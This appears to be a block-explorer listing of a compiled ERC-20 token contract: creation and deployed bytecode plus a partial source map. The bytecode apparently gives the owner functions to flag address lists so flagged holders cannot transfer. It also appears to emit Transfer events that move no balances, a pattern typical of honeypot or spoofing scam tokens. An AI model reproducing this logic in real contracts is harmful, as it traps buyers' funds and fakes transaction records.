01610d0690611a08565b60405180910390fd5b610d1a8383836110e9565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610da1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9890611a9a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610ed55750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610f315760011515600560009054906101000a900460ff16151514610f30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2790611ae0565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f8e91906112c8565b60405180910390a3610fa18484846110ee565b50505050565b610faf6109d4565b73ffffffffffffffffffffffffffffffffffffffff16610fcd6105bc565b73ffffffffffffffffffffffffffffffffffffffff1614611023576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101a90611b4c565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561112d578082015181840152602081019050611112565b60008484015250505050565b6000601f19601f8301169050919050565b6000611155826110f3565b61115f81856110fe565b935061116f81856020860161110f565b61117881611139565b840191505092915050565b6000602082019050818103600083015261119d818461114a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111da826111af565b9050919050565b6111ea816111cf565b81146111f557600080fd5b50565b600081359050611207816111e1565b92915050565b6000819050919050565b6112208161120d565b811461122b57600080fd5b50565b60008135905061123d81611217565b92915050565b6000806040838503121561125a576112596111a5565b5b6000611268858286016111f8565b92505060206112798582860161122e565b9150509250929050565b60008115159050919050565b61129881611283565b82525050565b60006020820190506112b3600083018461128f565b92915050565b6112c28161120d565b82525050565b60006020820190506112dd60008301846112b9565b92915050565b6000806000606084860312156112fc576112fb6111a5565b5b600061130a868287016111f8565b935050602061131b868287016111f8565b925050604061132c8682870161122e565b9150509250925092565b600060ff82169050919050565b61134c81611336565b82525050565b60006020820190506113676000830184611343565b92915050565b600060208284031215611383576113826111a5565b5b6000611391848285016111f8565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126113bf576113be61139a565b5b8235905067ffffffffffffffff8111156113dc576113db61139f565b5b6020830191508360208202830111156113f8576113f76113a4565b5b9250929050565b60008060208385031215611416576114156111a5565b5b600083013567ffffffffffffffff811115611434576114336111aa565b5b611440858286016113a9565b92509250509250929050565b611455816111cf565b82525050565b6000602082019050611470600083018461144c565b92915050565b6000806040838503121561148d5761148c6111a5565b5b600061149b858286016111f8565b92505060206114ac858286016111f8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114fd57607f821691505b6020821081036115105761150f6114b6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115508261120d565b915061155b8361120d565b925082820190508082111561157357611572611516565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006115b38261120d565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036115e5576115e4611516565b5b600182019050919050565b6000819050919050565b6000819050919050565b600061161f61161a611615846115f0565b6115fa565b61120d565b9050919050565b61162f81611604565b82525050565b600060208201905061164a6000830184611626565b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006116ac6025836110fe565b91506116b782611650565b604082019050919050565b600060208201905081810360008301526116db8161169f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061173e6026836110fe565b9150611749826116e2565b604082019050919050565b6000602082019050818103600083015261176d81611731565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117d06024836110fe565b91506117db82611774565b604082019050919050565b600060208201905081810360008301526117ff816117c3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118626022836110fe565b915061186d82611806565b604082019050919050565b6000602082019050818103600083015261189181611855565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118ce601d836110fe565b91506118d982611898565b602082019050919050565b600060208201905081810360008301526118fd816118c1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119606025836110fe565b915061196b82611904565b604082019050919050565b6000602082019050818103600083015261198f81611953565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119f26023836110fe565b91506119fd82611996565b604082019050919050565b60006020820190508181036000830152611a21816119e5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a846026836110fe565b9150611a8f82611a28565b604082019050919050565b60006020820190508181036000830152611ab381611a77565b9050919050565b50565b6000611aca6000836110fe565b9150611ad582611aba565b600082019050919050565b60006020820190508181036000830152611af981611abd565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b366020836110fe565b9150611b4182611b00565b602082019050919050565b60006020820190508181036000830152611b6581611b29565b905091905056fea2646970667358221220973d49bb6011e1504f1f41ed83511f0376d1fdbe8a5b2835065969c1160fe32b64736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061010b5760003560e01c806377a1736b116100a2578063a06c1a3311610071578063a06c1a33146102bc578063a457c2d7146102d8578063a9059cbb14610308578063dd62ed3e14610338578063f2fde38b146103685761010b565b806377a1736b146102345780638da5cb5b1461025057806390135fe41461026e57806395d89b411461029e5761010b565b8063313ce567116100de578063313ce567146101ac57806339509351146101ca57806370a08231146101fa578063715018a61461022a5761010b565b806306fdde0314610110578063095ea7b31461012e57806318160ddd1461015e57806323b872dd1461017c575b600080fd5b610118610384565b6040516101259190611183565b60405180910390f35b61014860048036038101906101439190611243565b610416565b604051610155919061129e565b60405180910390f35b610166610439565b60405161017391906112c8565b60405180910390f35b610196600480360381019061019191906112e3565b610443565b6040516101a3919061129e565b60405180910390f35b6101b4610472565b6040516101c19190611352565b60405180910390f35b6101e460048036038101906101df9190611243565b61047b565b6040516101f1919061129e565b60405180910390f35b610214600480360381019061020f919061136d565b6104b2565b60405161022191906112c8565b60405180910390f35b6102326104fb565b005b61024e600480360381019061024991906113ff565b61050f565b005b6102586105bc565b604051610265919061145b565b60405180910390f35b6102886004803603810190610283919061136d565b6105e5565b604051610295919061129e565b60405180910390f35b6102a661063b565b6040516102b39190611183565b60405180910390f35b6102d660048036038101906102d191906113ff565b6106cd565b005b6102f260048036038101906102ed9190611243565b610830565b6040516102ff919061129e565b60405180910390f35b610322600480360381019061031d9190611243565b6108a7565b60405161032f919061129e565b60405180910390f35b610352600480360381019061034d9190611476565b6108ca565b60405161035f91906112c8565b60405180910390f35b610382600480360381019061037d919061136d565b610951565b005b606060068054610393906114e5565b80601f01602080910402602001604051908101604052809291908181526020018280546103bf906114e5565b801561040c5780601f106103e15761010080835404028352916020019161040c565b820191906000526020600020905b8154815290600101906020018083116103ef57829003601f168201915b5050505050905090565b6000806104216109d4565b905061042e8185856109dc565b600191505092915050565b6000600454905090565b60008061044e6109d4565b905061045b858285610ba5565b610466858585610c31565b60019150509392505050565b60006012905090565b6000806104866109d4565b90506104a781858561049885896108ca565b6104a29190611545565b6109dc565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610503610fa7565b61050d6000611025565b565b610517610fa7565b60005b828290508110156105b75760006002600085858581811061053e5761053d611579565b5b9050602002016020810190610553919061136d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555080806105af906115a8565b91505061051a565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b60606007805461064a906114e5565b80601f0160208091040260200160405190810160405280929190818152602001828054610676906114e5565b80156106c35780601f10610698576101008083540402835291602001916106c3565b820191906000526020600020905b8154815290600101906020018083116106a657829003601f168201915b5050505050905090565b6106d5610fa7565b60005b82829050811015610775576001600260008585858181106106fc576106fb611579565b5b9050602002016020810190610711919061136d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061076d906115a8565b9150506106d8565b508181600081811061078a57610789611579565b5b905060200201602081019061079f919061136d565b73ffffffffffffffffffffffffffffffffffffffff16828260008181106107c9576107c8611579565b5b90506020020160208101906107de919061136d565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60126040516108249190611635565b60405180910390a35050565b60008061083b6109d4565b9050600061084982866108ca565b90508381101561088e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610885906116c2565b60405180910390fd5b61089b82868684036109dc565b60019250505092915050565b6000806108b26109d4565b90506108bf818585610c31565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610959610fa7565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109bf90611754565b60405180910390fd5b6109d181611025565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a4b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a42906117e6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610aba576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ab190611878565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b9891906112c8565b60405180910390a3505050565b6000610bb184846108ca565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c2b5781811015610c1d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c14906118e4565b60405180910390fd5b610c2a84848484036109dc565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ca0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9790611976565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d0f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0690611a08565b60405180910390fd5b610d1a8383836110e9565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610da1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9890611a9a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610ed55750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610f315760011515600560009054906101000a900460ff16151514610f30576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2790611ae0565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f8e91906112c8565b60405180910390a3610fa18484846110ee565b50505050565b610faf6109d4565b73ffffffffffffffffffffffffffffffffffffffff16610fcd6105bc565b73ffffffffffffffffffffffffffffffffffffffff1614611023576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101a90611b4c565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561112d578082015181840152602081019050611112565b60008484015250505050565b6000601f19601f8301169050919050565b6000611155826110f3565b61115f81856110fe565b935061116f81856020860161110f565b61117881611139565b840191505092915050565b6000602082019050818103600083015261119d818461114a565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111da826111af565b9050919050565b6111ea816111cf565b81146111f557600080fd5b50565b600081359050611207816111e1565b92915050565b6000819050919050565b6112208161120d565b811461122b57600080fd5b50565b60008135905061123d81611217565b92915050565b6000806040838503121561125a576112596111a5565b5b6000611268858286016111f8565b92505060206112798582860161122e565b9150509250929050565b60008115159050919050565b61129881611283565b82525050565b60006020820190506112b3600083018461128f565b92915050565b6112c28161120d565b82525050565b60006020820190506112dd60008301846112b9565b92915050565b6000806000606084860312156112fc576112fb6111a5565b5b600061130a868287016111f8565b935050602061131b868287016111f8565b925050604061132c8682870161122e565b9150509250925092565b600060ff82169050919050565b61134c81611336565b82525050565b60006020820190506113676000830184611343565b92915050565b600060208284031215611383576113826111a5565b5b6000611391848285016111f8565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f8401126113bf576113be61139a565b5b8235905067ffffffffffffffff8111156113dc576113db61139f565b5b6020830191508360208202830111156113f8576113f76113a4565b5b9250929050565b60008060208385031215611416576114156111a5565b5b600083013567ffffffffffffffff811115611434576114336111aa565b5b611440858286016113a9565b92509250509250929050565b611455816111cf565b82525050565b6000602082019050611470600083018461144c565b92915050565b6000806040838503121561148d5761148c6111a5565b5b600061149b858286016111f8565b92505060206114ac858286016111f8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806114fd57607f821691505b6020821081036115105761150f6114b6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115508261120d565b915061155b8361120d565b925082820190508082111561157357611572611516565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b60006115b38261120d565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036115e5576115e4611516565b5b600182019050919050565b6000819050919050565b6000819050919050565b600061161f61161a611615846115f0565b6115fa565b61120d565b9050919050565b61162f81611604565b82525050565b600060208201905061164a6000830184611626565b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006116ac6025836110fe565b91506116b782611650565b604082019050919050565b600060208201905081810360008301526116db8161169f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061173e6026836110fe565b9150611749826116e2565b604082019050919050565b6000602082019050818103600083015261176d81611731565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006117d06024836110fe565b91506117db82611774565b604082019050919050565b600060208201905081810360008301526117ff816117c3565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006118626022836110fe565b915061186d82611806565b604082019050919050565b6000602082019050818103600083015261189181611855565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006118ce601d836110fe565b91506118d982611898565b602082019050919050565b600060208201905081810360008301526118fd816118c1565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006119606025836110fe565b915061196b82611904565b604082019050919050565b6000602082019050818103600083015261198f81611953565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119f26023836110fe565b91506119fd82611996565b604082019050919050565b60006020820190508181036000830152611a21816119e5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a846026836110fe565b9150611a8f82611a28565b604082019050919050565b60006020820190508181036000830152611ab381611a77565b9050919050565b50565b6000611aca6000836110fe565b9150611ad582611aba565b600082019050919050565b60006020820190508181036000830152611af981611abd565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611b366020836110fe565b9150611b4182611b00565b602082019050919050565b60006020820190508181036000830152611b6581611b29565b905091905056fea2646970667358221220973d49bb6011e1504f1f41ed83511f0376d1fdbe8a5b2835065969c1160fe32b64736f6c63430008120033

Deployed Bytecode Sourcemap

21811:144:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8708:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11682:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10451:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12463:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9670:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13167:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10622:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5797:103;;;:::i;:::-;;10047:205;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5156:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10260:126;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8927:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9771:268;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13908:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10955:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11211:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6055:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8708:100;8762:13;8795:5;8788:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8708:100;:::o;11682:201::-;11765:4;11782:13;11798:12;:10;:12::i;:::-;11782:28;;11821:32;11830:5;11837:7;11846:6;11821:8;:32::i;:::-;11871:4;11864:11;;;11682:201;;;;:::o;10451:108::-;10512:7;10539:12;;10532:19;;10451:108;:::o;12463:295::-;12594:4;12611:15;12629:12;:10;:12::i;:::-;12611:30;;12652:38;12668:4;12674:7;12683:6;12652:15;:38::i;:::-;12701:27;12711:4;12717:2;12721:6;12701:9;:27::i;:::-;12746:4;12739:11;;;12463:295;;;;;:::o;9670:93::-;9728:5;9753:2;9746:9;;9670:93;:::o;13167:238::-;13255:4;13272:13;13288:12;:10;:12::i;:::-;13272:28;;13311:64;13320:5;13327:7;13364:10;13336:25;13346:5;13353:7;13336:9;:25::i;:::-;:38;;;;:::i;:::-;13311:8;:64::i;:::-;13393:4;13386:11;;;13167:238;;;;:::o;10622:127::-;10696:7;10723:9;:18;10733:7;10723:18;;;;;;;;;;;;;;;;10716:25;;10622:127;;;:::o;5797:103::-;5042:13;:11;:13::i;:::-;5862:30:::1;5889:1;5862:18;:30::i;:::-;5797:103::o:0;10047:205::-;5042:13;:11;:13::i;:::-;10132:9:::1;10127:118;10151:11;;:18;;10147:1;:22;10127:118;;;10228:5;10191:18;:34;10210:11;;10222:1;10210:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10191:34;;;;;;;;;;;;;;;;:42;;;;;;;;;;;;;;;;;;10171:3;;;;;:::i;:::-;;;;10127:118;;;;10047:205:::0;;:::o;5156:87::-;5202:7;5229:6;;;;;;;;;;;5222:13;;5156:87;:::o;10260:126::-;10325:4;10349:18;:29;10368:9;10349:29;;;;;;;;;;;;;;;;;;;;;;;;;10342:36;;10260:126;;;:::o;8927:104::-;8983:13;9016:7;9009:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8927:104;:::o;9771:268::-;5042:13;:11;:13::i;:::-;9857:9:::1;9852:117;9876:11;;:18;;9872:1;:22;9852:117;;;9953:4;9916:18;:34;9935:11;;9947:1;9935:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9916:34;;;;;;;;;;;;;;;;:41;;;;;;;;;;;;;;;;;;9896:3;;;;;:::i;:::-;;;;9852:117;;;;10009:11;;10021:1;10009:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9984:47;;9993:11;;10005:1;9993:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9984:47;;;10025:5;9984:47;;;;;;:::i;:::-;;;;;;;;9771:268:::0;;:::o;13908:436::-;14001:4;14018:13;14034:12;:10;:12::i;:::-;14018:28;;14057:24;14084:25;14094:5;14101:7;14084:9;:25::i;:::-;14057:52;;14148:15;14128:16;:35;;14120:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14241:60;14250:5;14257:7;14285:15;14266:16;:34;14241:8;:60::i;:::-;14332:4;14325:11;;;;13908:436;;;;:::o;10955:193::-;11034:4;11051:13;11067:12;:10;:12::i;:::-;11051:28;;11090;11100:5;11107:2;11111:6;11090:9;:28::i;:::-;11136:4;11129:11;;;10955:193;;;;:::o;11211:151::-;11300:7;11327:11;:18;11339:5;11327:18;;;;;;;;;;;;;;;:27;11346:7;11327:27;;;;;;;;;;;;;;;;11320:34;;11211:151;;;;:::o;6055:201::-;5042:13;:11;:13::i;:::-;6164:1:::1;6144:22;;:8;:22;;::::0;6136:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6220:28;6239:8;6220:18;:28::i;:::-;6055:201:::0;:::o;3865:98::-;3918:7;3945:10;3938:17;;3865:98;:::o;18050:380::-;18203:1;18186:19;;:5;:19;;;18178:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18284:1;18265:21;;:7;:21;;;18257:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18368:6;18338:11;:18;18350:5;18338:18;;;;;;;;;;;;;;;:27;18357:7;18338:27;;;;;;;;;;;;;;;:36;;;;18406:7;18390:32;;18399:5;18390:32;;;18415:6;18390:32;;;;;;:::i;:::-;;;;;;;;18050:380;;;:::o;18721:453::-;18856:24;18883:25;18893:5;18900:7;18883:9;:25::i;:::-;18856:52;;18943:17;18923:16;:37;18919:248;;19005:6;18985:16;:26;;18977:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19089:51;19098:5;19105:7;19133:6;19114:16;:25;19089:8;:51::i;:::-;18919:248;18845:329;18721:453;;;:::o;14814:955::-;14961:1;14945:18;;:4;:18;;;14937:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15038:1;15024:16;;:2;:16;;;15016:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15093:38;15114:4;15120:2;15124:6;15093:20;:38::i;:::-;15144:19;15166:9;:15;15176:4;15166:15;;;;;;;;;;;;;;;;15144:37;;15215:6;15200:11;:21;;15192:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15332:6;15318:11;:20;15300:9;:15;15310:4;15300:15;;;;;;;;;;;;;;;:38;;;;15535:6;15518:9;:13;15528:2;15518:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15567:18;:24;15586:4;15567:24;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;15595:18;:22;15614:2;15595:22;;;;;;;;;;;;;;;;;;;;;;;;;15567:50;15563:102;;;15656:4;15627:33;;:25;;;;;;;;;;;:33;;;15619:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;15563:102;15700:2;15685:26;;15694:4;15685:26;;;15704:6;15685:26;;;;;;:::i;:::-;;;;;;;;15724:37;15744:4;15750:2;15754:6;15724:19;:37::i;:::-;14926:843;14814:955;;;:::o;5321:132::-;5396:12;:10;:12::i;:::-;5385:23;;:7;:5;:7::i;:::-;:23;;;5377:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5321:132::o;6416:191::-;6490:16;6509:6;;;;;;;;;;;6490:25;;6535:8;6526:6;;:17;;;;;;;;;;;;;;;;;;6590:8;6559:40;;6580:8;6559:40;;;;;;;;;;;;6479:128;6416:191;:::o;20506:125::-;;;;:::o;19778:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368